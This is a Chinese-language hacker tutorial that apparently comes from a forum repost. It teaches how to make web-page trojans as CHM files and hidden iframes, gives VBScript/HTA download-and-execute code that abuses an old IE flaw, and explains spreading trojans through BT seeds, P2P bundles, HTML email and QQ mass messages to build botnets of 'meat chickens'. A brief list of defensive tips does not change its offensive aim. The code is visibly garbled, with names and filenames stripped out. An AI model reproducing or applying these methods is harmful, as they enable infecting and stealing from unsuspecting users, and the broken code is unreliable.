網(wǎng)頁木馬制作

2023年11月18日發(fā)(作者：放生羊)網(wǎng)頁木馬制作與傳播



2009-08-19 22:30最簡單的也就是用ChmBuilder這個軟件來制作chm木馬了，首先我們要配置好一個木馬服務(wù)端，我再這里就拿QQ殺手7.1版說下把。關(guān)于他的使用和配置我就不多說了把，下載了這軟件都自帶有幫助文件的，看幾遍就會明白的了。然后生成服務(wù)端，假設(shè)我生成的木馬服務(wù)端為，接著打開ChmBuilder選擇我們的mm

.exe然后點生成，就會在相同目錄下自動生成一個和 (注意：這幾個文件可不要輕易去點哦，萬一出了什么后果，不要找偶~~~……^_^) 接著就把和傳到自己的空間，如果沒空間有肉雞也是可以滴，建議最好用肉雞，這樣萬一對方發(fā)現(xiàn)了也是你發(fā)現(xiàn)你肉雞。但是有的空間還是比較嚴格的，在上傳時會發(fā)現(xiàn)那個并不存在，那就是被對方的殺毒軟件查殺了把。 到了這里我們就需要另外一個軟件了htmtool

網(wǎng)頁加密程序，選擇源文件為目標文件然后點加密，程序就會在目錄下生成一個用javascript加密后的，然后把傳肉雞或空間里去把。 我在本機測試。_blank>127.0.0.1/就是我們的網(wǎng)頁木馬地址了，只要把這個發(fā)給別人，對方瀏覽了就會中了我們的木馬。 但是對方會相信你嗎？現(xiàn)在的網(wǎng)民安全意識也稍微提高了點，對于你發(fā)來的站都不會輕易去點。 所以呢~~還是自己動手把。入侵~~~~掛馬！嘿嘿~~對不起那些站長了。 相信大家也都知道這個名詞把.....不知道的就....別找我哦。



一般在你入侵了一個站拿到了webshell的時候，有的人也就是改下主頁來滿足自己的虛榮心把。下面來說掛馬把。最常見的 掛站代碼如下 ：









把以上代碼插到對方網(wǎng)頁代碼中，那么下次別人瀏覽了那個站點就會自動轉(zhuǎn)向_blank>127.0.0.1/。而_blank>127.0.0.1/也就是我門的網(wǎng)頁木馬了，那width="0" height="0"又是什么意思呢？懂點英文的朋友也應(yīng)該知道了把，width就是寬而height自然就是高了。我們把它設(shè)置為0也就是不顯示了，對方也就看不見我們的這個頁面，木馬也就會被下載到本地。



不過感覺這個方法已經(jīng)過失了，現(xiàn)在的站長在發(fā)現(xiàn)自己的站被掛了木馬后，如果主頁代碼過多，只要搜索iframe就能找到了我們的木馬了，一個del，哈哈~~~~玩完了。





所以，下面再介紹幾個把。



單獨利用chm這個文件來達到盜號目的。假設(shè)我們的木馬服務(wù)端還是為然后在他相同目錄下建一個文件，代碼如下



當然你也可以把和換成是別的文件名。然后用QuickCHM這個軟件來編譯成為chm文件。（這些工具在google都能搜索到的）然后chm向?qū)А＿x中*.*，項目文件夾就是剛才那兩個和

所在的目錄了。

然后下一步，htm文件在上，exe文件在下，接著可以編譯他了。

編輯成功后千萬不要點“是”給運行了。那樣自己就中了馬了~~然后就會發(fā)現(xiàn)原來的2個文件已經(jīng)多出了四個

， ， ， 其實最后三個是沒用的，刪了他把只留一個 ，然后把他改任意名上傳空間。



但這個掛馬就不能用上面的那段代碼了。假設(shè)我做好的chm木馬為_blank>127.0.0.1/



那就用以下代碼

【學(xué)網(wǎng)教程】





以前寫了一篇文章，講了關(guān)于怎樣用最簡單的方法獲取對方的管理權(quán)限，里面用到了網(wǎng)頁木馬，最近有許多網(wǎng)友問我怎樣制作網(wǎng)頁木馬，就這個問題我發(fā)表篇比較簡單易懂的文章，希望大家珍惜我的勞動成果。



我們經(jīng)常聽到這樣的忠告：“不要隨意下在不明的程序，不要隨意打開郵件的附件...”這樣的忠告確實是有用的，不過我們的系統(tǒng)有不少漏洞，許多木馬已經(jīng)不需要客戶端和服務(wù)端了，他們利用這些系統(tǒng)漏洞按照被系統(tǒng)認為合法的代碼執(zhí)行木馬的功能，有的木馬會在你完全不知道的情況下潛入，現(xiàn)在我來講解下通過IE6的漏洞實現(xiàn)訪問網(wǎng)頁后神不知鬼不覺的下在并執(zhí)行指定程序的例子，也就是網(wǎng)頁木馬.







首先我們需要編寫幾個簡單的文件







一。名字為的文件











＜html＞



＜script language="vbscript"＞



Function HttpDoGet(url)



t oReq = CreateObject("P")



"GET",url,fal







If =200 then



HttpDoGet=Body



Savefile HttpDoGet,"c:"



End If



Set oReq=nothing



End Function



sub SaveFile()



Set objStream = CreateObject("")



=1







str



File fName.2



()



t objStream = nothing



exewin()



End sub



Sub exewin()



t wshshell=createobject ("" )



a= (" /c c:",0)



b= (" /c del c:",0)







End Sub



HttpDoGet "127.0.0.1/"



＜/script＞



＜/html＞



二。名字為的文件







＜html＞＜body＞



木馬運行測試！（這句話可以改成你想說的）



＜object date="127.0.0.1/win

.test";;;＞＜/object＞



＜/body＞＜/html＞







三。名字為的文件











＜html＞



＜body＞



＜script language="vbscript"＞



Function HttpDoGet(url)



t oReq = CreateObject("P")



"GET",url,fal







If =200 then



HttpDoGet,"c:"



Set oReq=nothing



End if



end function



sub SaveFile(str,fName)



Dim fso, tf



S e t f s o = C r e a t e O bj e c t(stemObject")



Set tf = Textfile(fName,True)



str







exewin()



End sub



Sub exewin()



t wshshell=createobject ("" )



a= (" /c c:",0)







End Sub



HttpDoGet("127.0.0.1/")



＜/script＞



＜/body＞



＜/html＞



四。名字為的木馬程序。







暈...這個就不用我提供了吧，你想用什么木馬就把他的名字換成傳上去就可以了。







服務(wù)器的文件列表



:對外發(fā)布的網(wǎng)頁



:下在文件到對方機器上，并且保存為并且執(zhí)行。



下載二進制的木馬文件，并執(zhí)行



：木馬程序。







上面所說的文件可以修改成任意名字，只是不要忘記把源碼里的文件指向也修改就可以了！







最后是設(shè)置IIS,打開“程序→管理工具→internet服務(wù)管理器”，右鍵單擊要設(shè)置的站點，選擇《屬性》，在選擇“http頭”。單擊“MIME映射”里的“文件類型”按鈕，并在關(guān)聯(lián)擴展名文本框中輸入“.hta”，在內(nèi)容類型(MIME)中輸入“application/hta",然后關(guān)閉所有窗口就可以了。







有許多朋友多遇見過，說什么贈送Q號或者玩網(wǎng)游的時候里面有人喊贈送好東東在XXX網(wǎng)址，其實那上面所說的例子用的就是這種原理，不知不覺中你機器上的所有有關(guān)于密碼或者指定名詞的東西全發(fā)送到對方指定的郵件箱里去了







看完后是否覺得這種木馬太危險，甚至有種想把網(wǎng)線拔掉的感覺那？呵呵，其實了解了網(wǎng)頁木馬的工作原理后我們就不難防護他，看完以上內(nèi)容后就可以得出一個結(jié)論，網(wǎng)頁木馬主要利用IE的漏洞來實現(xiàn)的，所以在預(yù)防的時候一定要做到以下幾點就可以保證上網(wǎng)的安全了，



A。安裝IE的最新版本并且隨時下在才做系統(tǒng)和IE的補丁程序。



B。不隨便登陸不熟悉朋友送來的網(wǎng)站，對于熟悉的朋友也要小心哦。



C。不隨便登陸黑客網(wǎng)站（^_^黑基除外了啦，我擔保的...），色情網(wǎng)站，尤其一些賣外掛，賣木馬的網(wǎng)站。



D。不隨便打開和預(yù)覽有附件的郵件。



E。安裝防火墻和殺毒軟件的最新版本，經(jīng)常進行升級和查毒





傳播



本文章總節(jié)歸納了目前最流行的木馬傳播技術(shù)以及以后木馬傳播技術(shù)

的發(fā)展趨勢,



內(nèi)容相當豐富.相信看完本教程你一定會成為養(yǎng)雞專業(yè)戶.



一.目前流行木馬傳播技術(shù).



1.用BT制作木馬種子



利用BT制作木馬種子的教程網(wǎng)上也發(fā)布了很多,這里主要找一款具有誘惑性的軟件



然后捆綁上自己的木馬,做成種子,最后發(fā)布出去.相信利用BT抓雞速度可是超快哦.





2.利用PP共享自己捆了木馬的軟件或電影.



方法同BT一樣,要找誘惑性電影或軟件,捆上自己的木馬,然后共享自己的目錄,這樣人



家就會通過搜索找到你的軟件或電影.這里電影要配合網(wǎng)頁木馬.可以參看RealOnePla



ye木馬制作.在黑鷹可以找到.當你一打開我們的電影時就會打開我們制作過的網(wǎng)頁木



馬.這樣看電影也會中我們的馬.



3.利用QQ郵箱傳播木馬.



這里主要點HTML格式----在里面寫上以下這段代碼:







當人家一打開你發(fā)過去的郵件時,就會中我們的木馬.



群發(fā)網(wǎng)頁木馬。



首先，你要申請多個QQ號，然后找款QQ消息群發(fā)器（黑鷹網(wǎng)站可以找到大量相關(guān)QQ群



發(fā)信息軟件，）再然后要加上非常具有誘惑性的消息（肉雞的多與少與這個直接相關(guān)



，），騙取人家點你的網(wǎng)址。最后，在晚上時可以掛在電腦上群發(fā)帶有網(wǎng)頁木馬的信



息。相信只要你的信息夠誘惑，肉雞也是成群的。





5.利用163郵箱傳播網(wǎng)頁木馬。



同樣，這里用HTML格式，然后填上以下代碼：